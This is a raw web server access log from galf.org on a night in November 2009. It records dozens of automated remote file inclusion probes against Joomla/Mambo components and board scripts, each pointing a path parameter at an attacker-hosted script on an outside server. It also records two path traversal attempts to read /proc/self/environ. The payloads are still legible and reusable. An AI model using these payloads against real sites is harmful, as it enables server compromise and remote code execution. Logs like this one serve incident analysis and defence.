75.126.127.34 - - [29/Nov/2009:22:18:23 -0800] "GET /logs/access_090525.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:27 -0800] "GET /logs/access_090525.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:48 -0800] "GET /logs/access_090511.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:48 -0800] "GET /logs/access_090504.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:19:16 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [29/Nov/2009:22:19:16 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [29/Nov/2009:22:19:16 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:22:19:36 -0800] "GET /logs/access_090511.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:19:36 -0800] "GET /logs/access_090504.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:19:39 -0800] "GET /logs/access_090622.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:20:28 -0800] "GET /logs/access_090720.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:20:29 -0800] "GET /logs/access_090720.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:21:36 -0800] "GET /logs/access_090525.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:21:42 -0800] "GET /logs/access_090615.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:22:16 -0800] "GET /logs/access_090525.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:22:23 -0800] "GET /logs/access_090615.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:22:22:35 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:22:22:35 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:22:22:35 -0800] "GET /logs/access_090525.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:22:22:51 -0800] "GET /logs/access_090615.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:22:28:21 -0800] "GET /logs/access_090810.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:22:28:27 -0800] "GET /logs/access_090525.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [29/Nov/2009:22:29:11 -0800] "GET /logs/access_090622.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [29/Nov/2009:22:29:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [29/Nov/2009:22:29:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [29/Nov/2009:22:30:41 -0800] "GET /logs/errors.php?error=http://hydraumatec.com/administrator/components/com_users/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [29/Nov/2009:22:30:41 -0800] "GET /logs/access.log/errors.php?error=http://hydraumatec.com/administrator/components/com_users/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [29/Nov/2009:22:30:41 -0800] "GET /errors.php?error=http://hydraumatec.com/administrator/components/com_users/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.131.226.52 - - [29/Nov/2009:22:31:16 -0800] "GET /logs/access_090928.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [29/Nov/2009:22:31:16 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [29/Nov/2009:22:31:16 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:32:40 -0800] "GET /logs/access_090525.log//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:32:40 -0800] "GET /main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:32:40 -0800] "GET /logs//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:32:46 -0800] "GET /logs/access_090803.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.152 - - [29/Nov/2009:22:33:07 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:33:11 -0800] "GET /logs/access_090525.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:33:19 -0800] "GET /main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:33:19 -0800] "GET /logs/access_090525.log//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:33:19 -0800] "GET /logs//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:34:25 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:35:48 -0800] "GET /logs/access_091102.log//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:36:13 -0800] "GET /logs/access_091102.log//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:15 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:16 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:16 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:37 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:37 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:37 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:40 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:40 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:40 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:48 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:36:48 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:37:46 -0800] "GET /logs/access_090622.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:37:46 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:37:46 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:39:37 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:39:37 -0800] "GET /logs/access_090622.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:39:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:42:23 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:42:23 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:42:23 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:25 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:25 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:25 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:28 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:28 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:34 -0800] "GET /appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:34 -0800] "GET /logs//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:43:34 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:44:10 -0800] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [29/Nov/2009:22:44:10 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [29/Nov/2009:22:44:10 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [29/Nov/2009:22:45:06 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:45:06 -0800] "GET /logs/access_090713.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:45:06 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [29/Nov/2009:22:47:27 -0800] "GET /logs/access_090622.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
195.13.191.76 - - [29/Nov/2009:22:47:27 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:47:28 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.13.191.76 - - [29/Nov/2009:22:47:30 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:47:51 -0800] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:48:16 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:48:24 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:48:33 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://bagoess.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:22:49:04 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [29/Nov/2009:22:49:04 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [29/Nov/2009:22:49:04 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [29/Nov/2009:22:51:16 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:52:29 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:53:30 -0800] "GET /logs/access_091019.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:22:55:37 -0800] "GET /errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:22:55:38 -0800] "GET /logs/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:22:55:38 -0800] "GET /logs/access_090629.log%20%20/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:22:55:48 -0800] "GET /logs/access_090914.log%20%20/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:22:56:37 -0800] "GET /logs/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:22:56:37 -0800] "GET /errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:22:56:37 -0800] "GET /logs/access_090629.log/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:22:57:06 -0800] "GET /mcf.php?content=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
65.18.192.91 - - [29/Nov/2009:22:57:06 -0800] "GET /logs/access_090914.log/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:22:57:06 -0800] "GET /logs//mcf.php?content=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
213.186.34.130 - - [29/Nov/2009:22:57:06 -0800] "GET /logs/access.log//mcf.php?content=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
74.54.22.2 - - [29/Nov/2009:22:58:58 -0800] "GET /logs/access_090914.log//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:59:28 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:59:28 -0800] "GET /logs/access_090914.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:59:28 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:22:59:33 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [29/Nov/2009:22:59:41 -0800] "GET /logs/access_090914.log//main.php?_zb_path=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:22:59:51 -0800] "GET /main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:22:59:51 -0800] "GET /logs/access_090622.log//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
